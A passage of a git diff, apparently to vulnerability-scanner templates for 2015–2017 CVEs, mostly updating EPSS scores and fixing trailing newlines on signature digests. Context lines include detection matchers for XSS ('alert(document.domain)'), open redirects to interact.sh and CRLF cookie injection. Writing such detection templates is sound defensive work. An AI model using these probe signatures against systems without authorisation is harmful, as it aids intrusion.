b/http/cves/2015/CVE-2015-5469.yaml index db2e4671f3..bd36399f3d 100644 --- a/http/cves/2015/CVE-2015-5469.yaml +++ b/http/cves/2015/CVE-2015-5469.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2015-5469 cwe-id: CWE-22 epss-score: 0.02176 - epss-percentile: 0.88158 + epss-percentile: 0.88162 cpe: cpe:2.3:a:mdc_youtube_downloader_project:mdc_youtube_downloader:2.1.0:*:*:*:*:wordpress:*:* metadata: max-request: 1 @@ -41,4 +41,5 @@ http: - type: status status: - 200 -# digest: 4a0a0047304502203643fed1dde0b2e289298658a11fa61e89ae2095463daa549b449677c0a5467c022100a7084e9bee43d5866bb55d7d477fd0b7ecbc16a6852166eb0cce0b147baa168b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 4a0a0047304502203643fed1dde0b2e289298658a11fa61e89ae2095463daa549b449677c0a5467c022100a7084e9bee43d5866bb55d7d477fd0b7ecbc16a6852166eb0cce0b147baa168b:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2015/CVE-2015-5471.yaml b/http/cves/2015/CVE-2015-5471.yaml index fe7deb7d16..ae61a5781b 100644 --- a/http/cves/2015/CVE-2015-5471.yaml +++ b/http/cves/2015/CVE-2015-5471.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2015-5471 cwe-id: CWE-22 epss-score: 0.08185 - epss-percentile: 0.9368 + epss-percentile: 0.93681 cpe: cpe:2.3:a:swim_team_project:swim_team:1.44.10777:*:*:*:*:wordpress:*:* metadata: max-request: 1 diff --git a/http/cves/2015/CVE-2015-5531.yaml b/http/cves/2015/CVE-2015-5531.yaml index 893bb67040..781f501fe2 100644 --- a/http/cves/2015/CVE-2015-5531.yaml +++ b/http/cves/2015/CVE-2015-5531.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2015-5531 cwe-id: CWE-22 epss-score: 0.97144 - epss-percentile: 0.99746 + epss-percentile: 0.99747 cpe: cpe:2.3:a:elasticsearch:elasticsearch:*:*:*:*:*:*:*:* metadata: max-request: 3 diff --git a/http/cves/2015/CVE-2015-5688.yaml b/http/cves/2015/CVE-2015-5688.yaml index 59c660df21..0796e44f4a 100644 --- a/http/cves/2015/CVE-2015-5688.yaml +++ b/http/cves/2015/CVE-2015-5688.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2015-5688 cwe-id: CWE-22 epss-score: 0.01347 - epss-percentile: 0.8464 + epss-percentile: 0.84606 cpe: cpe:2.3:a:geddyjs:geddy:13.0.7:*:*:*:*:node.js:*:* metadata: max-request: 1 @@ -43,4 +43,5 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022100fe7538672a7661a802cd65f52f9ca60fbe4541601e09e847cc13ead756b752200220020077d957353f88195c9e6e16cf78a40c356e071e9b5e5e64ad39c099dcc575:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 4a0a00473045022100fe7538672a7661a802cd65f52f9ca60fbe4541601e09e847cc13ead756b752200220020077d957353f88195c9e6e16cf78a40c356e071e9b5e5e64ad39c099dcc575:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2015/CVE-2015-6477.yaml b/http/cves/2015/CVE-2015-6477.yaml index 5f50246b63..a4eb096b4d 100644 --- a/http/cves/2015/CVE-2015-6477.yaml +++ b/http/cves/2015/CVE-2015-6477.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2015-6477 cwe-id: CWE-79 epss-score: 0.00277 - epss-percentile: 0.64789 + epss-percentile: 0.64787 cpe: cpe:2.3:o:nordex:nordex_control_2_scada:*:*:*:*:*:*:*:* metadata: max-request: 1 @@ -45,4 +45,5 @@ http: part: body words: - "" -# digest: 4a0a0047304502201fcd03ba09ff13647fac419a403a36f8f2e8fcbc8bab8f130ff1322392298796022100de0473abe738e0398a3e61504af467307bc61db5bb83072f59496e4900c9639a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 4a0a0047304502201fcd03ba09ff13647fac419a403a36f8f2e8fcbc8bab8f130ff1322392298796022100de0473abe738e0398a3e61504af467307bc61db5bb83072f59496e4900c9639a:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2015/CVE-2015-6544.yaml b/http/cves/2015/CVE-2015-6544.yaml index 1636f88a4d..f7a2a9be1d 100644 --- a/http/cves/2015/CVE-2015-6544.yaml +++ b/http/cves/2015/CVE-2015-6544.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2015-6544 cwe-id: CWE-79 epss-score: 0.00284 - epss-percentile: 0.65223 + epss-percentile: 0.65225 cpe: cpe:2.3:a:combodo:itop:*:*:*:*:*:*:*:* metadata: max-request: 1 @@ -47,4 +47,5 @@ http: - type: status status: - 200 -# digest: 4a0a004730450221009c3d5b209640b7515143c6f91858c041cab9d833d77c0dd3b8cce1fdbe8cad7c022067738d3503a135af34f39d3be877b970e0143562899df1af3cddf09471a77d11:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 4a0a004730450221009c3d5b209640b7515143c6f91858c041cab9d833d77c0dd3b8cce1fdbe8cad7c022067738d3503a135af34f39d3be877b970e0143562899df1af3cddf09471a77d11:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2015/CVE-2015-6920.yaml b/http/cves/2015/CVE-2015-6920.yaml index 85fc6e15d5..31a2ba0204 100644 --- a/http/cves/2015/CVE-2015-6920.yaml +++ b/http/cves/2015/CVE-2015-6920.yaml @@ -17,7 +17,7 @@ info: cve-id: CVE-2015-6920 cwe-id: CWE-79 epss-score: 0.0016 - epss-percentile: 0.52623 + epss-percentile: 0.52597 cpe: cpe:2.3:a:sourceafrica_project:sourceafrica:0.1.3:*:*:*:*:wordpress:*:* metadata: max-request: 1 @@ -46,4 +46,5 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022100bd09a46633b30db78ad82beb233d333a227f79f5b1e272c9d11e9bbc62b9adb80220480c476ae0a64a62663d60d1436883be618bba660b0ee46315b63a1ec7f3cc16:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 4a0a00473045022100bd09a46633b30db78ad82beb233d333a227f79f5b1e272c9d11e9bbc62b9adb80220480c476ae0a64a62663d60d1436883be618bba660b0ee46315b63a1ec7f3cc16:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2015/CVE-2015-7245.yaml b/http/cves/2015/CVE-2015-7245.yaml index d39eed217c..10238274a9 100644 --- a/http/cves/2015/CVE-2015-7245.yaml +++ b/http/cves/2015/CVE-2015-7245.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2015-7245 cwe-id: CWE-22 epss-score: 0.96881 - epss-percentile: 0.99628 + epss-percentile: 0.99631 cpe: cpe:2.3:o:d-link:dvg-n5402sp_firmware:w1000cn-00:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2015/CVE-2015-7377.yaml b/http/cves/2015/CVE-2015-7377.yaml index 10843efd36..b924bee86a 100644 --- a/http/cves/2015/CVE-2015-7377.yaml +++ b/http/cves/2015/CVE-2015-7377.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2015-7377 cwe-id: CWE-79 epss-score: 0.00239 - epss-percentile: 0.61801 + epss-percentile: 0.61781 cpe: cpe:2.3:a:genetechsolutions:pie_register:*:*:*:*:*:wordpress:*:* metadata: max-request: 1 @@ -48,4 +48,5 @@ http: - type: status status: - 200 -# digest: 490a004630440220686a116bd558bcaa349ad94ec37d1eacc91c535604d9fac33e02eff01475ef0f02204737c101fc1bd09303be8033c8ebe4acb8b235321b4c3905b7e771e778b832af:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 490a004630440220686a116bd558bcaa349ad94ec37d1eacc91c535604d9fac33e02eff01475ef0f02204737c101fc1bd09303be8033c8ebe4acb8b235321b4c3905b7e771e778b832af:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2015/CVE-2015-7450.yaml b/http/cves/2015/CVE-2015-7450.yaml index a4924df2ef..3886059109 100644 --- a/http/cves/2015/CVE-2015-7450.yaml +++ b/http/cves/2015/CVE-2015-7450.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2015-7450 cwe-id: CWE-94 epss-score: 0.9739 - epss-percentile: 0.99902 + epss-percentile: 0.99901 cpe: cpe:2.3:a:ibm:tivoli_common_reporting:2.1:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2015/CVE-2015-7780.yaml b/http/cves/2015/CVE-2015-7780.yaml index c504785cb6..da086cdc16 100644 --- a/http/cves/2015/CVE-2015-7780.yaml +++ b/http/cves/2015/CVE-2015-7780.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2015-7780 cwe-id: CWE-22 epss-score: 0.00151 - epss-percentile: 0.51256 + epss-percentile: 0.5124 cpe: cpe:2.3:a:zohocorp:manageengine_firewall_analyzer:*:*:*:*:*:*:*:* metadata: max-request: 1 @@ -48,4 +48,5 @@ http: - type: status status: - 200 -# digest: 4b0a00483046022100b701e0acc240493afaef5fd8ebf5a7a39b962e9058c45707096228ca00ace088022100f1a5af1ebbc71e0b432b901eadee80a2c863ef6e540c521d8c521fb4160feb97:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 4b0a00483046022100b701e0acc240493afaef5fd8ebf5a7a39b962e9058c45707096228ca00ace088022100f1a5af1ebbc71e0b432b901eadee80a2c863ef6e540c521d8c521fb4160feb97:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2015/CVE-2015-7823.yaml b/http/cves/2015/CVE-2015-7823.yaml index 5def519931..7d4bc12a7c 100644 --- a/http/cves/2015/CVE-2015-7823.yaml +++ b/http/cves/2015/CVE-2015-7823.yaml @@ -17,7 +17,7 @@ info: cve-id: CVE-2015-7823 cwe-id: NVD-CWE-Other epss-score: 0.00233 - epss-percentile: 0.61263 + epss-percentile: 0.61238 cpe: cpe:2.3:a:kentico:kentico_cms:8.2:*:*:*:*:*:*:* metadata: max-request: 1 @@ -35,4 +35,5 @@ http: part: header regex: - '(?m)^(?:Location\s*?:\s*?)(?:https?://|//)?(?:[a-zA-Z0-9\-_\.@]*)interact\.sh.*$' -# digest: 4b0a00483046022100d3f27f5fa434847ddc2eafe145c188e3c284c45971b02bfffbf5ca3f769bbe26022100a8fcf9e31705e5a5e4001c1f3e2deb215a3b80e81ba9641c35d95775c5f810d7:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 4b0a00483046022100d3f27f5fa434847ddc2eafe145c188e3c284c45971b02bfffbf5ca3f769bbe26022100a8fcf9e31705e5a5e4001c1f3e2deb215a3b80e81ba9641c35d95775c5f810d7:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2015/CVE-2015-8349.yaml b/http/cves/2015/CVE-2015-8349.yaml index 51a225d819..f2372423d1 100644 --- a/http/cves/2015/CVE-2015-8349.yaml +++ b/http/cves/2015/CVE-2015-8349.yaml @@ -16,7 +16,7 @@ info: cve-id: CVE-2015-8349 cwe-id: CWE-79 epss-score: 0.0013 - epss-percentile: 0.47701 + epss-percentile: 0.47684 cpe: cpe:2.3:a:gameconnect:sourcebans:*:*:*:*:*:*:*:* metadata: max-request: 1 @@ -44,4 +44,5 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022044445921dcd6b3f9f39f7fc19cba40e32e3efa820ac978bada9a5404c6ba4b97022100c7aece61efc917480b00bded85a755cee4d078c34a1d7f4a855b54fea8ccf85a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 4a0a00473045022044445921dcd6b3f9f39f7fc19cba40e32e3efa820ac978bada9a5404c6ba4b97022100c7aece61efc917480b00bded85a755cee4d078c34a1d7f4a855b54fea8ccf85a:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2015/CVE-2015-8813.yaml b/http/cves/2015/CVE-2015-8813.yaml index b3dac2782f..53169974a2 100644 --- a/http/cves/2015/CVE-2015-8813.yaml +++ b/http/cves/2015/CVE-2015-8813.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2015-8813 cwe-id: CWE-918 epss-score: 0.00511 - epss-percentile: 0.73948 + epss-percentile: 0.7394 cpe: cpe:2.3:a:umbraco:umbraco:*:*:*:*:*:*:*:* metadata: max-request: 1 @@ -37,4 +37,5 @@ http: part: interactsh_protocol # Confirms the HTTP Interaction words: - "http" -# digest: 4a0a0047304502205f5ee89a3565eb7f3c7206ab3181809b6f9df2612692431dd2da679b0272f9e7022100c2d120cd7ab9a7c17986906efa9509aa04aa0383c105bdc3badda5df70b55c0d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 4a0a0047304502205f5ee89a3565eb7f3c7206ab3181809b6f9df2612692431dd2da679b0272f9e7022100c2d120cd7ab9a7c17986906efa9509aa04aa0383c105bdc3badda5df70b55c0d:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2015/CVE-2015-9312.yaml b/http/cves/2015/CVE-2015-9312.yaml index eb7691923c..cff43296ea 100644 --- a/http/cves/2015/CVE-2015-9312.yaml +++ b/http/cves/2015/CVE-2015-9312.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2015-9312 cwe-id: CWE-79 epss-score: 0.00088 - epss-percentile: 0.37 + epss-percentile: 0.36961 cpe: cpe:2.3:a:newstatpress_project:newstatpress:*:*:*:*:*:wordpress:*:* metadata: verified: true @@ -47,4 +47,5 @@ http: - 'contains(body_2, "")' - '!contains(body_3, "")' condition: and -# digest: 4a0a004730450220255cdfabf2b4effea7a2edf6c6b50ab0d324a73d1ec0dbaeffacc9885236f62d0221009be2863ea7d12ac4835221371f0e907e682c5c3cf82597d1b1002f30c09337e8:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 4a0a004730450220255cdfabf2b4effea7a2edf6c6b50ab0d324a73d1ec0dbaeffacc9885236f62d0221009be2863ea7d12ac4835221371f0e907e682c5c3cf82597d1b1002f30c09337e8:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2016/CVE-2016-10956.yaml b/http/cves/2016/CVE-2016-10956.yaml index addbe826f0..84b020a800 100644 --- a/http/cves/2016/CVE-2016-10956.yaml +++ b/http/cves/2016/CVE-2016-10956.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2016-10956 cwe-id: CWE-20 epss-score: 0.01913 - epss-percentile: 0.8725 + epss-percentile: 0.87247 cpe: cpe:2.3:a:mail-masta_project:mail-masta:1.0:*:*:*:*:wordpress:*:* metadata: max-request: 2 diff --git a/http/cves/2016/CVE-2016-10960.yaml b/http/cves/2016/CVE-2016-10960.yaml index d6a5dff480..3854de435b 100644 --- a/http/cves/2016/CVE-2016-10960.yaml +++ b/http/cves/2016/CVE-2016-10960.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2016-10960 cwe-id: CWE-20 epss-score: 0.01127 - epss-percentile: 0.83025 + epss-percentile: 0.83013 cpe: cpe:2.3:a:joomlaserviceprovider:wsecure:*:*:*:*:lite:wordpress:*:* metadata: max-request: 1 diff --git a/http/cves/2016/CVE-2016-10973.yaml b/http/cves/2016/CVE-2016-10973.yaml index 5544bec883..cf81e1648a 100644 --- a/http/cves/2016/CVE-2016-10973.yaml +++ b/http/cves/2016/CVE-2016-10973.yaml @@ -17,7 +17,7 @@ info: cve-id: CVE-2016-10973 cwe-id: CWE-79 epss-score: 0.00177 - epss-percentile: 0.54842 + epss-percentile: 0.54825 cpe: cpe:2.3:a:brafton:brafton:*:*:*:*:*:wordpress:*:* metadata: verified: true @@ -47,4 +47,5 @@ http: - 'contains(body_2, "tab = alert(document.domain);")' - 'contains(body_2, "Brafton Article Loader")' condition: and -# digest: 4a0a00473045022058ecf65fbc8a0b0e8aee39639931c5051fc8d0ddd91747964940e73d117c6bf4022100cfe2943021a1986266422a50a94a9e5c2468b894a96deffc3c4f165eb0aa6aac:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 4a0a00473045022058ecf65fbc8a0b0e8aee39639931c5051fc8d0ddd91747964940e73d117c6bf4022100cfe2943021a1986266422a50a94a9e5c2468b894a96deffc3c4f165eb0aa6aac:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2016/CVE-2016-10993.yaml b/http/cves/2016/CVE-2016-10993.yaml index da0b3dbe06..75caf775aa 100644 --- a/http/cves/2016/CVE-2016-10993.yaml +++ b/http/cves/2016/CVE-2016-10993.yaml @@ -17,7 +17,7 @@ info: cve-id: CVE-2016-10993 cwe-id: CWE-79 epss-score: 0.00245 - epss-percentile: 0.62427 + epss-percentile: 0.62415 cpe: cpe:2.3:a:scoreme_project:scoreme:*:*:*:*:*:wordpress:*:* metadata: max-request: 1 @@ -46,4 +46,5 @@ http: - type: status status: - 200 -# digest: 490a0046304402205948b62ab9b68220f62e1e6e44547a71b95ce048cb90c51485394904bfbe8e7602201e6bf2758f05b436e64fe0909857aed70f724d613bd34ee0f8795ee71f33e65f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 490a0046304402205948b62ab9b68220f62e1e6e44547a71b95ce048cb90c51485394904bfbe8e7602201e6bf2758f05b436e64fe0909857aed70f724d613bd34ee0f8795ee71f33e65f:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2016/CVE-2016-1555.yaml b/http/cves/2016/CVE-2016-1555.yaml index 92d6c7f5cd..bba5ec68e0 100644 --- a/http/cves/2016/CVE-2016-1555.yaml +++ b/http/cves/2016/CVE-2016-1555.yaml @@ -18,8 +18,8 @@ info: cvss-score: 9.8 cve-id: CVE-2016-1555 cwe-id: CWE-77 - epss-score: 0.97375 - epss-percentile: 0.99887 + epss-score: 0.97321 + epss-percentile: 0.99858 cpe: cpe:2.3:o:netgear:wnap320_firmware:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2016/CVE-2016-2389.yaml b/http/cves/2016/CVE-2016-2389.yaml index edb404e839..ef8af92982 100644 --- a/http/cves/2016/CVE-2016-2389.yaml +++ b/http/cves/2016/CVE-2016-2389.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2016-2389 cwe-id: CWE-22 epss-score: 0.24589 - epss-percentile: 0.96169 + epss-percentile: 0.96163 cpe: cpe:2.3:a:sap:netweaver:7.40:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2016/CVE-2016-3088.yaml b/http/cves/2016/CVE-2016-3088.yaml index 25861e8b65..0dd56b74ad 100644 --- a/http/cves/2016/CVE-2016-3088.yaml +++ b/http/cves/2016/CVE-2016-3088.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2016-3088 cwe-id: CWE-20 epss-score: 0.83955 - epss-percentile: 0.98155 + epss-percentile: 0.98156 cpe: cpe:2.3:a:apache:activemq:*:*:*:*:*:*:*:* metadata: max-request: 2 @@ -47,4 +47,5 @@ http: - "status_code_2==200" - "contains((body_2), '{{rand1}}')" condition: and -# digest: 490a0046304402204fc5e7bab23041fb529dfeb883d429da88706f4bf71397ed358c08f03dd1cc5d02206b4586f255ffa3b7cd291d7c81a59fa839cc6dfb00b27a898ac0297bd22e14f1:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 490a0046304402204fc5e7bab23041fb529dfeb883d429da88706f4bf71397ed358c08f03dd1cc5d02206b4586f255ffa3b7cd291d7c81a59fa839cc6dfb00b27a898ac0297bd22e14f1:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2016/CVE-2016-3978.yaml b/http/cves/2016/CVE-2016-3978.yaml index d6ec27bf58..d0791ada56 100644 --- a/http/cves/2016/CVE-2016-3978.yaml +++ b/http/cves/2016/CVE-2016-3978.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2016-3978 cwe-id: CWE-79 epss-score: 0.00217 - epss-percentile: 0.59615 + epss-percentile: 0.5959 cpe: cpe:2.3:o:fortinet:fortios:5.0.0:*:*:*:*:*:*:* metadata: max-request: 1 @@ -36,4 +36,5 @@ http: part: header regex: - '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)(?:[a-zA-Z0-9\-_\.@]*)interact\.sh\/?(\/|[^.].*)?$' # https://regex101.com/r/L403F0/1 -# digest: 4a0a00473045022008138d51fecfda28d994679a8d7e41f6794e0a1bb9ea6d0b9508e217d349b47c022100968733bb8f1bf3a9d3eacd29bb8ff197c5cd27fd932f5f5e143bba12db81e645:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 4a0a00473045022008138d51fecfda28d994679a8d7e41f6794e0a1bb9ea6d0b9508e217d349b47c022100968733bb8f1bf3a9d3eacd29bb8ff197c5cd27fd932f5f5e143bba12db81e645:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2016/CVE-2016-4975.yaml b/http/cves/2016/CVE-2016-4975.yaml index 1c1ca5d747..911cc6bead 100644 --- a/http/cves/2016/CVE-2016-4975.yaml +++ b/http/cves/2016/CVE-2016-4975.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2016-4975 cwe-id: CWE-93 epss-score: 0.00428 - epss-percentile: 0.71605 + epss-percentile: 0.71596 cpe: cpe:2.3:a:apache:http_server:2.2.0:*:*:*:*:*:*:* metadata: max-request: 1 @@ -36,4 +36,5 @@ http: part: header regex: - '(?m)^(?:Set-Cookie\s*?:(?:\s*?|.*?;\s*?))(crlfinjection=crlfinjection)(?:\s*?)(?:$|;)' -# digest: 4a0a00473045022100e026de7b84b02e263adfea43d62e199f23ae930a4a2244bbca9e9567638af18c02207c45e36844468ac6efa53b2bc20fa73a2cbbe848421945966e4f849924d5caeb:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 4a0a00473045022100e026de7b84b02e263adfea43d62e199f23ae930a4a2244bbca9e9567638af18c02207c45e36844468ac6efa53b2bc20fa73a2cbbe848421945966e4f849924d5caeb:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2016/CVE-2016-4977.yaml b/http/cves/2016/CVE-2016-4977.yaml index a0c97d36df..b138ccbfc9 100644 --- a/http/cves/2016/CVE-2016-4977.yaml +++ b/http/cves/2016/CVE-2016-4977.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2016-4977 cwe-id: CWE-19 epss-score: 0.03345 - epss-percentile: 0.90327 + epss-percentile: 0.90331 cpe: cpe:2.3:a:pivotal:spring_security_oauth:1.0.0:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2016/CVE-2016-5649.yaml b/http/cves/2016/CVE-2016-5649.yaml index 33542994b8..b6f058aa64 100644 --- a/http/cves/2016/CVE-2016-5649.yaml +++ b/http/cves/2016/CVE-2016-5649.yaml @@ -15,9 +15,9 @@ info: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: CVE-2016-5649 - cwe-id: CWE-319,CWE-200 + cwe-id: CWE-200,CWE-319 epss-score: 0.15148 - epss-percentile: 0.95292 + epss-percentile: 0.95288 cpe: cpe:2.3:o:netgear:dgn2200_firmware:1.0.0.50_7.0.50:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2016/CVE-2016-6195.yaml b/http/cves/2016/CVE-2016-6195.yaml index d9cbfc3d31..4367cb6eba 100644 --- a/http/cves/2016/CVE-2016-6195.yaml +++ b/http/cves/2016/CVE-2016-6195.yaml @@ -20,7 +20,7 @@ info: cve-id: CVE-2016-6195 cwe-id: CWE-89 epss-score: 0.00284 - epss-percentile: 0.65215 + epss-percentile: 0.65217 cpe: cpe:2.3:a:vbulletin:vbulletin:*:patch_level_4:*:*:*:*:*:* metadata: verified: "true" @@ -54,4 +54,5 @@ http: - 200 - 503 condition: or -# digest: 4b0a00483046022100d4b8ca33a491292913cba5c6c32a2ba6999de494113d796c2401ec14a101bbc7022100cf80ef1696d5ad1320435daaad7786054c265f715baa0927fc90169d475bc7a7:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 4b0a00483046022100d4b8ca33a491292913cba5c6c32a2ba6999de494113d796c2401ec14a101bbc7022100cf80ef1696d5ad1320435daaad7786054c265f715baa0927fc90169d475bc7a7:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2016/CVE-2016-7552.yaml b/http/cves/2016/CVE-2016-7552.yaml index dc41201245..0e56530a8d 100644 --- a/http/cves/2016/CVE-2016-7552.yaml +++ b/http/cves/2016/CVE-2016-7552.yaml @@ -17,7 +17,7 @@ info: cve-id: CVE-2016-7552 cwe-id: CWE-22 epss-score: 0.97004 - epss-percentile: 0.99679 + epss-percentile: 0.99681 cpe: cpe:2.3:a:trendmicro:threat_discovery_appliance:2.6.1062:r1:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2016/CVE-2016-7834.yaml b/http/cves/2016/CVE-2016-7834.yaml index 808f0d56ee..c505191359 100644 --- a/http/cves/2016/CVE-2016-7834.yaml +++ b/http/cves/2016/CVE-2016-7834.yaml @@ -20,7 +20,7 @@ info: cve-id: CVE-2016-7834 cwe-id: CWE-200 epss-score: 0.00202 - epss-percentile: 0.5805 + epss-percentile: 0.58034 cpe: cpe:2.3:o:sony:snc_series_firmware:*:*:*:*:*:*:*:* metadata: max-request: 1 @@ -48,4 +48,5 @@ http: - type: status status: - 204 -# digest: 4a0a00473045022100add48ae39a7918cdf6d8a975d232f2408d103ab4d324e6292b939bb92ea9b92c0220734913ad4a04d6d92cd3d15d6294308ac9ec893acd196ec0ce397f4b7b8ac8f9:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 4a0a00473045022100add48ae39a7918cdf6d8a975d232f2408d103ab4d324e6292b939bb92ea9b92c0220734913ad4a04d6d92cd3d15d6294308ac9ec893acd196ec0ce397f4b7b8ac8f9:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2016/CVE-2016-7981.yaml b/http/cves/2016/CVE-2016-7981.yaml index 12db6cf057..585ebf5bc8 100644 --- a/http/cves/2016/CVE-2016-7981.yaml +++ b/http/cves/2016/CVE-2016-7981.yaml @@ -20,7 +20,7 @@ info: cve-id: CVE-2016-7981 cwe-id: CWE-79 epss-score: 0.00258 - epss-percentile: 0.63412 + epss-percentile: 0.63403 cpe: cpe:2.3:a:spip:spip:*:*:*:*:*:*:*:* metadata: max-request: 1 @@ -48,4 +48,5 @@ http: - type: status status: - 200 -# digest: 4a0a0047304502207c4ef7ae36a3fb558be8e6ecfa6ca1ff35f93c9d74df429e2890c7d783ae0981022100a2ef001ae7eb170403be9b84b79e9d094c4002033f6dd8e9e1829e634c558d35:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 4a0a0047304502207c4ef7ae36a3fb558be8e6ecfa6ca1ff35f93c9d74df429e2890c7d783ae0981022100a2ef001ae7eb170403be9b84b79e9d094c4002033f6dd8e9e1829e634c558d35:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2016/CVE-2016-8527.yaml b/http/cves/2016/CVE-2016-8527.yaml index d02673a7cb..0087f76d0b 100644 --- a/http/cves/2016/CVE-2016-8527.yaml +++ b/http/cves/2016/CVE-2016-8527.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2016-8527 cwe-id: CWE-79 epss-score: 0.0024 - epss-percentile: 0.6188 + epss-percentile: 0.61862 cpe: cpe:2.3:a:hp:airwave:*:*:*:*:*:*:*:* metadata: max-request: 1 @@ -46,4 +46,5 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022100ffbc4758fc3d9295f1cb8a7ae67b1c46c329f07ed02a107707bdd6eb0d89bfb002205b4d1f369bd70aee6949771820d8650e9dedff50aec356aa036094a296c88ba6:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 4a0a00473045022100ffbc4758fc3d9295f1cb8a7ae67b1c46c329f07ed02a107707bdd6eb0d89bfb002205b4d1f369bd70aee6949771820d8650e9dedff50aec356aa036094a296c88ba6:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2017/CVE-2017-0929.yaml b/http/cves/2017/CVE-2017-0929.yaml index e1618381a4..5155ca09e8 100644 --- a/http/cves/2017/CVE-2017-0929.yaml +++ b/http/cves/2017/CVE-2017-0929.yaml @@ -17,7 +17,7 @@ info: cve-id: CVE-2017-0929 cwe-id: CWE-918 epss-score: 0.00753 - epss-percentile: 0.7892 + epss-percentile: 0.78914 cpe: cpe:2.3:a:dnnsoftware:dotnetnuke:*:*:*:*:*:*:*:* metadata: max-request: 1 @@ -40,4 +40,5 @@ http: - type: status status: - 500 -# digest: 490a0046304402206e5a4a3f4f6f41f461e3e6edbbaf52fc873b27040898b1db09a5c954fd3341e10220053e440943c83ede946a43ff2e979b0ab0a1f51eb78c682f4d9bc1cb4f9135d7:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 490a0046304402206e5a4a3f4f6f41f461e3e6edbbaf52fc873b27040898b1db09a5c954fd3341e10220053e440943c83ede946a43ff2e979b0ab0a1f51eb78c682f4d9bc1cb4f9135d7:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2017/CVE-2017-1000029.yaml b/http/cves/2017/CVE-2017-1000029.yaml index 3f1b5a0166..766e2c83e3 100644 --- a/http/cves/2017/CVE-2017-1000029.yaml +++ b/http/cves/2017/CVE-2017-1000029.yaml @@ -17,7 +17,7 @@ info: cve-id: CVE-2017-1000029 cwe-id: CWE-200 epss-score: 0.00387 - epss-percentile: 0.70219 + epss-percentile: 0.70211 cpe: cpe:2.3:a:oracle:glassfish_server:3.0.1:*:*:*:open_source:*:*:* metadata: max-request: 1 @@ -39,4 +39,5 @@ http: - type: status status: - 200 -# digest: 